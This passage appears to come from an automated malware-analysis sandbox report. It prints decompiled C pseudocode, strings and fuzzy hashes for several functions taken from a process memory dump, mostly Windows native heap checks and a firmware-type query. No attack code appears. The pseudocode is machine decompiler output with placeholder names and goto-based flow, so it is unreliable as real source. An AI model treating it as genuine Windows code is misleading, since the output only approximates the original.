				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t62;
				signed int _t63;
				intOrPtr _t64;
				signed int _t65;
				intOrPtr _t77;
				signed int* _t91;
				intOrPtr _t92;
				signed int _t95;
				signed char _t109;
				signed int _t114;
				unsigned int _t119;
				intOrPtr* _t122;
				intOrPtr _t127;
				signed int _t130;
				void* _t135;

				_t92 = __ecx;
				_t122 = __edx;
				_v8 = __ecx;
				 *((intOrPtr*)(__ecx + 0xb4)) = __edx;
				if( *__edx != 0) {
					_t95 =  *((intOrPtr*)(__edx + 4)) -  *((intOrPtr*)(__edx + 0x14)) - 1;
					__eflags =  *(__edx + 8);
					if(__eflags != 0) {
						_t95 = _t95 + _t95;
					}
					 *( *((intOrPtr*)(_t122 + 0x20)) + _t95 * 4) =  *( *((intOrPtr*)(_t122 + 0x20)) + _t95 * 4) & 0x00000000;
					asm("btr eax, esi");
					_t92 = _v8;
				}
				_t62 = _t92 + 0xc0;
				_t127 =  *((intOrPtr*)(_t62 + 4));
				while(1) {
					L2:
					_v12 = _t127;
					if(_t62 == _t127) {
						break;
					}
					_t7 = _t127 - 8; // -8
					_t91 = _t7;
					if( *((intOrPtr*)(_t92 + 0x4c)) != 0) {
						_t119 =  *(_t92 + 0x50) ^  *_t91;
						 *_t91 = _t119;
						_t109 = _t119 >> 0x00000010 ^ _t119 >> 0x00000008 ^ _t119;
						if(_t119 >> 0x18 != _t109) {
							_push(_t109);
							E00FAFA2B(_t91, _v8, _t91, _t122, _t127, __eflags);
						}
						_t92 = _v8;
					}
					_t114 =  *_t91 & 0x0000ffff;
					_t63 = _t122;
					_t135 = _t114 -  *((intOrPtr*)(_t122 + 4));
					while(1) {
						_v20 = _t63;
						if(_t135 < 0) {
							break;
						}
						_t130 =  *_t63;
						_v16 = _t130;
						_t127 = _v12;
						if(_t130 != 0) {
							_t63 = _v16;
							__eflags = _t114 -  *((intOrPtr*)(_t63 + 4));
							continue;
						}
						_v16 =  *((intOrPtr*)(_t63 + 4)) - 1;
						L10:
						if( *_t122 != 0) {
							_t64 =  *((intOrPtr*)(_t122 + 4));
							__eflags = _t114 - _t64;
							_t65 = _t64 - 1;
							__eflags = _t65;
							if(_t65 < 0) {
								_t65 = _t114;
							}
							E00F1BC04(_t92, _t122, 1, _t127, _t65, _t114);
						}
						E00F1E4A0(_v8, _v20, 1, _t127, _v16,  *_t91 & 0x0000ffff);
						if( *0xfe8748 >= 1) {
							__eflags =  *( *((intOrPtr*)(_v20 + 0x1c)) + (_v16 -  *((intOrPtr*)(_v20 + 0x14)) >> 5) * 4) & 1 << (_v16 -  *((intOrPtr*)(_v20 + 0x14)) & 0x0000001f);
							if(__eflags == 0) {
								_t77 =  *[fs:0x30];
								__eflags =  *(_t77 + 0xc);
								if( *(_t77 + 0xc) == 0) {
									_push("HEAP: ");
									E00EFB150();
								} else {
									E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))");
								E00EFB150();
								__eflags =  *0xfe7bc8;
								if(__eflags == 0) {
									__eflags = 1;
									E00FB2073(_t91, 1, _t122, 1);
								}
							}
							_t127 = _v12;
						}
						_t92 = _v8;
						if( *((intOrPtr*)(_t92 + 0x4c)) != 0) {
							_t91[0] = _t91[0] ^ _t91[0] ^  *_t91;
							 *_t91 =  *_t91 ^  *(_t92 + 0x50);
						}
						_t127 =  *((intOrPtr*)(_t127 + 4));
						_t62 = _t92 + 0xc0;
						goto L2;
					}
					_v16 = _t114;
					goto L10;
				}
				return _t62;
			}

0x00f1eb9a
0x00f1eba5
0x00f1eba7
0x00f1ebaa
0x00f1ebb3
0x00f1eca0
0x00f1eca1
0x00f1eca5
0x00f1ecd1
0x00f1ecd1
0x00f1ecaa
0x00f1ecc3
0x00f1ecc9
0x00f1ecc9
0x00f1ebb9
0x00f1ebbf
0x00f1ebc2
0x00f1ebc2
0x00f1ebc2
0x00f1ebc7
0x00000000
0x00000000
0x00f1ebd1
0x00f1ebd1
0x00f1ebd4
0x00f1ebd9
0x00f1ebdd
0x00f1ebe9
0x00f1ebf0
0x00f64258
0x00f6425e
0x00f6425e
0x00f1ebf6
0x00f1ebf6
0x00f1ebf9
0x00f1ebfc
0x00f1ebfe
0x00f1ec01
0x00f1ec01
0x00f1ec04
0x00000000
0x00000000
0x00f1ec0a
0x00f1ec0e
0x00f1ec11
0x00f1ec14
0x00f1ec8f
0x00f1ec92
0x00000000
0x00f1ec92
0x00f1ec1a
0x00f1ec1d
0x00f1ec20
0x00f1ec72
0x00f1ec75
0x00f1ec77
0x00f1ec77
0x00f1ec78
0x00f1ec7a
0x00f1ec7a
0x00f1ec83
0x00f1ec83
0x00f1ec32
0x00f1ec3e
0x00f64281
0x00f64284
0x00f64286
0x00f6428c
0x00f64290
0x00f642af
0x00f642b4
0x00f64292
0x00f642a7
0x00f642ac
0x00f642ba
0x00f642bf
0x00f642c4
0x00f642cc
0x00f642d0
0x00f642d1
0x00f642d1
0x00f642cc
0x00f642d6
0x00f642d6
0x00f1ec44
0x00f1ec4b
0x00f1ec55
0x00f1ec5b
0x00f1ec5b
0x00f1ec5d
0x00f1ec60
0x00000000
0x00f1ec60
0x00f1ec8a
0x00000000
0x00f1ec8a
0x00f1ec71

Strings

HEAP[%wZ]: , xrefs: 00F642A2
RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 00F642BA
HEAP: , xrefs: 00F642AF

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
API String ID: 0-1596344177
Opcode ID: e40771b34175350bd36ec7eb99d73eac9eb3e2405f89e08cecef003b07cee3f0
Instruction ID: 01519f25c4cfea8c5c8053b62740b4db921a75e03a523eefb34a5c4e05933eb1
Opcode Fuzzy Hash: e40771b34175350bd36ec7eb99d73eac9eb3e2405f89e08cecef003b07cee3f0
Instruction Fuzzy Hash: E151B131A04515DFCB18DF58C994BAAB7F1FF85310F2581A9E809AB342D731AD82EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F1B8E4, Relevance: 3.8, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00F1B8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0xfe8748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E00EFB150();
						} else {
							E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E00EFB150();
						__eflags =  *0xfe7bc8;
						if(__eflags == 0) {
							E00FB2073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E00F1AB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}

0x00f1b8f0
0x00f1b8f2
0x00f1b8f4
0x00f62c4e
0x00f62c50
0x00f62c56
0x00f62c5c
0x00f62c60
0x00f62c7f
0x00f62c84
0x00f62c62
0x00f62c77
0x00f62c7c
0x00f62c8a
0x00f62c8f
0x00f62c94
0x00f62c9c
0x00f62ca5
0x00f62ca5
0x00f62c9c
0x00f62c50
0x00f1b8fa
0x00f1b902
0x00f1b921
0x00f1b921
0x00f1b924
0x00f1b924
0x00f1b927
0x00000000
0x00000000
0x00f1b929
0x00f1b92b
0x00f1b92d
0x00f1b940
0x00000000
0x00f1b940
0x00f1b932
0x00f1b932
0x00000000
0x00f1b932
0x00000000
0x00f1b904
0x00f1b904
0x00f1b90a
0x00f1b90c
0x00f1b916
0x00f1b919
0x00f1b915
0x00f1b915
0x00f1b91b
0x00f1b91b
0x00000000
0x00f1b910

Strings

HEAP[%wZ]: , xrefs: 00F62C72
HEAP: , xrefs: 00F62C7F
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 00F62C8A

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 2c7b567aca29b04792a367bc886886beca4c96090ab23429618eb8229e5ed547
Instruction ID: b9f643f0db3bf71facbd5f1e23416f85e26e306ef8773cb94551c14307895422
Opcode Fuzzy Hash: 2c7b567aca29b04792a367bc886886beca4c96090ab23429618eb8229e5ed547
Instruction Fuzzy Hash: 6811EE32705605CBD728EB15C891BBAB3A5EB40B30F248169F14ACB250DB30D882F741

Uniqueness

Uniqueness Score: -1.00%

Function 00FBE539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00FBE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E00FBBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E00FBBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E00FBAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E00F39730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E00FBA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E00FBA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E00F39730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E00FBA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E00FBA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E00F12280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E00F0B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E00F0FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E00F17D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E00FAFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x00fbe547
0x00fbe549
0x00fbe54f
0x00fbe553
0x00fbe557
0x00fbe55a
0x00fbe55c
0x00fbe55f
0x00fbe561
0x00fbe567
0x00fbe56b
0x00fbe7e2
0x00000000
0x00fbe571
0x00fbe575
0x00fbe577
0x00fbe57b
0x00fbe57c
0x00fbe57d
0x00fbe57e
0x00fbe57f
0x00fbe588
0x00fbe58f
0x00fbe591
0x00fbe592
0x00fbe592
0x00fbe596
0x00fbe59e
0x00fbe5a0
0x00fbe5a6
0x00fbe61d
0x00fbe61d
0x00fbe621
0x00fbe623
0x00fbe630
0x00fbe630
0x00fbe7e6
0x00fbe7eb
0x00fbe7ed
0x00fbe7f4
0x00fbe7fa
0x00fbe7ff
0x00fbe7ff
0x00fbe80a
0x00fbe812
0x00fbe812
0x00fbe5ab
0x00fbe5b4
0x00fbe5b9
0x00fbe5be
0x00fbe5c0
0x00fbe5c2
0x00fbe5c8
0x00fbe5c9
0x00fbe5cb
0x00fbe5cc
0x00fbe5d5
0x00fbe5e4
0x00fbe5f1
0x00fbe5f8
0x00fbe5f8
0x00fbe5d5
0x00fbe602
0x00fbe616
0x00fbe63d
0x00fbe644
0x00fbe64d
0x00fbe652
0x00fbe657
0x00fbe659
0x00fbe65b
0x00fbe661
0x00fbe662
0x00fbe664
0x00fbe665
0x00fbe66e
0x00fbe67d
0x00fbe68a
0x00fbe691
0x00fbe691
0x00fbe66e
0x00fbe6b0
0x00000000
0x00fbe6b6
0x00fbe6bd
0x00fbe6c7
0x00fbe6d7
0x00fbe6d9
0x00fbe6db
0x00fbe6de
0x00fbe6e3
0x00fbe6f3
0x00fbe6fc
0x00fbe700
0x00fbe700
0x00fbe704
0x00fbe70a
0x00fbe70a
0x00fbe713
0x00fbe716
0x00fbe719
0x00fbe720
0x00fbe761
0x00fbe76b
0x00fbe774
0x00fbe77a
0x00fbe77a
0x00fbe78a
0x00fbe791
0x00fbe799
0x00fbe79b
0x00fbe79f
0x00fbe7aa
0x00fbe7c0
0x00fbe7ac
0x00fbe7b2
0x00fbe7b9
0x00fbe7b9
0x00fbe7c7
0x00fbe806
0x00000000
0x00fbe7c9
0x00fbe7d1
0x00fbe7d8
0x00000000
0x00fbe7d8
0x00000000
0x00000000
0x00fbe722
0x00fbe72e
0x00fbe748
0x00fbe74c
0x00fbe754
0x00fbe756
0x00fbe75c
0x00fbe75c
0x00000000
0x00fbe75c
0x00fbe758
0x00fbe758
0x00000000
0x00fbe758
0x00fbe750
0x00000000
0x00000000
0x00fbe752
0x00000000
0x00fbe752
0x00fbe730
0x00fbe735
0x00fbe73d
0x00fbe73f
0x00000000
0x00000000
0x00fbe741
0x00fbe741
0x00000000
0x00fbe741
0x00fbe739
0x00000000
0x00000000
0x00fbe73b
0x00000000
0x00fbe73b
0x00fbe722
0x00fbe720
0x00fbe6b0
0x00fbe618
0x00000000
0x00fbe618

Strings

`, xrefs: 00FBE5D7
`, xrefs: 00FBE670

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 927b3128e4a20b2f46d2f9e8cf557169e341209903420d9b6ff87db9dae83984
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 3F9180316043419FE724CE26CD41B9BB7E6AF84724F14892DF9A5CB281EB74E904EF52

Uniqueness

Uniqueness Score: -1.00%

Function 00F751BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00F751BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0xfd05f0);
				E00F4D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E00F0EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E00F753CA(0);
						return E00F4D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E00F3F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E00F13690(1, _t117, 0xed1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E00F3AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L00F14620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E00F3AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E00F7500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E00F39860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x00f751be
0x00f751c3
0x00f751c8
0x00f751cd
0x00f751d0
0x00f751d3
0x00f751d8
0x00f751db
0x00f751de
0x00f751e0
0x00f751e3
0x00f751e6
0x00f751e8
0x00f75342
0x00f75351
0x00f75356
0x00f7535a
0x00f75360
0x00f75363
0x00f75366
0x00f75369
0x00f75369
0x00f7536b
0x00f7536b
0x00f75370
0x00f753a3
0x00f753a4
0x00f753a6
0x00f753ab
0x00f753ab
0x00f753ae
0x00f753ae
0x00f753b5
0x00f753bf
0x00f753bf
0x00f75375
0x00f75396
0x00f753a0
0x00f753a0
0x00000000
0x00f75396
0x00f75377
0x00f75379
0x00f7537f
0x00f7538c
0x00f75390
0x00000000
0x00f75390
0x00f751ee
0x00f751f1
0x00f75301
0x00f75310
0x00f75315
0x00f75318
0x00f7531b
0x00f75320
0x00f7532e
0x00f75331
0x00000000
0x00f75331
0x00f75328
0x00f75329
0x00000000
0x00f75329
0x00f751fa
0x00f75235
0x00f75236
0x00f75239
0x00f7523f
0x00f75240
0x00f75241
0x00f75242
0x00f75246
0x00f75247
0x00f7524e
0x00f75251
0x00f75267
0x00f75269
0x00f7526e
0x00f7527d
0x00f7527e
0x00f75281
0x00f75282
0x00f75287
0x00f75288
0x00f7528a
0x00f7528f
0x00f75294
0x00000000
0x00000000
0x00f7529a
0x00f7529c
0x00f7529e
0x00f7529e
0x00f752a4
0x00f752b0
0x00000000
0x00000000
0x00f752ba
0x00f752bc
0x00f752bc
0x00f752d4
0x00f752d9
0x00f752dc
0x00f752e1
0x00000000
0x00000000
0x00f752e7
0x00f752f4
0x00000000
0x00f752f4
0x00f75270
0x00000000
0x00f75270
0x00f751fc
0x00f751fd
0x00f75202
0x00f75203
0x00f75205
0x00f7520a
0x00f7520f
0x00000000
0x00000000
0x00f7521b
0x00f75226
0x00f7522b
0x00f7521d
0x00f7521d
0x00f75222
0x00f75222
0x00f7522d
0x00000000

Strings

Legacy, xrefs: 00F75226
UEFI, xrefs: 00F7521D

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 7b604282277dc71871c4eef5e053312c6aa7544ca3f407438383caaf19f36faa
Instruction ID: 5b8293ce1da03219f8f82a224ce5ddc47e3b3975ce67488885a3f9beff277c9f
Opcode Fuzzy Hash: 7b604282277dc71871c4eef5e053312c6aa7544ca3f407438383caaf19f36faa
Instruction Fuzzy Hash: F9517072E00A099FDB14DFA8C840BADB7F5FB48B40F14802EE549EB291DAB09D41EB11

Uniqueness

Uniqueness Score: -1.00%

Function 00EFB171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00EFB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0xfcf7a8);
				E00F4D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E00F4D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E00F3D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E00F3F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
